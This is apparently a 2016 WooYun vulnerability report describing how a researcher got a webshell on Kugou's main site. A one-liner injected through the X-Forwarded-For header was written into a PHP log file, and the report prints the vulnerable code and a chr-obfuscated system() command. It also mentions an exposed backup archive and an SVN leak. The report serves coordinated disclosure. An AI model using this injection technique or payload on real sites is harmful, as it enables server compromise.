当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0168825

漏洞标题:昨夜酷狗主站可Getshell(修复速度太快了)

相关厂商:酷狗

漏洞作者: getshell1993

提交时间:2016-01-10 11:47

修复时间:2016-02-22 16:48

公开时间:2016-02-22 16:48

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-10: 细节已通知厂商并且等待厂商处理中
2016-01-10: 厂商已经确认,细节仅向厂商公开
2016-01-20: 细节向核心白帽子及相关领域专家公开
2016-01-30: 细节向普通白帽子公开
2016-02-09: 细节向实习白帽子公开
2016-02-22: 细节向公众公开

简要描述:

睡了个觉,起床发现漏洞补了,大周末的,要不要这么快!!!!!

详细说明:

问题在于1月8号晚
发现酷狗主站存在备份文件
http://www.kugou.com/www.kugou.com.tar.gz

1.png


下回来一看发现是主站的旧备份

2.png


本来准备先提交的,不过发现过了一会居然备份被删了。
9号发现一处可直接getshell
errorPage/pc_errorhelp.php
errorPage/pc_errorhelp2.php

3.png


$preg = '/Windows NT (\d)/U';
@preg_match($preg,$_SERVER['HTTP_USER_AGENT'],$match);
$win = empty($match[1])?5:(int)$match[1];
$isFirstTime = empty($_COOKIE['IEor']);
@setcookie("IEor", 1, time()+3600*24,'/','.kugou.com');//写cookie备用检查是否正常
$log = date('Y-m-d H:i:s')."\t".MygetIP()."\t".$ver."\t".$win."\t".($isFirstTime?"First":"NotF").PHP_EOL;
@file_put_contents('help_log.php',$log,FILE_APPEND);
function MygetIP(){
$realIP = FALSE;
if(!empty($_SERVER['HTTP_CLIENT_IP'])){
$realIP = $_SERVER['HTTP_CLIENT_IP'];
}
if(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])){
$ips = explode(',',$_SERVER['HTTP_X_FORWARDED_FOR']);
foreach($ips as $ip){
$ip = trim($ip);
if(!isLAN($ip)){ //非局域网
$realIP = $ip;
break;
}
}
}

4.png


X-Forwarded-For 加上一句话

4.jpg


访问http://www.kugou.com/errorPage/help_log.php(超级卡)

1.png


搜99999 存在证明成功了

2.png


漏洞证明:

5.png


也可以执行命令
x=system(chr(108).chr(115).chr(32).chr(45).chr(108).chr(97));

6.jpg


搞到这困得不行,已经凌晨快一点了,睡了个觉,起床发现漏洞补了,没想到修复速度快得惊人啊。

7.png


附送一个SVN泄露
fyb.kugou.com

1.png

修复方案:

备份别再放根目录啦~

版权声明:转载请注明来源 getshell1993@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2016-01-10 12:06

厂商回复:

谢谢提交!

最新状态:

暂无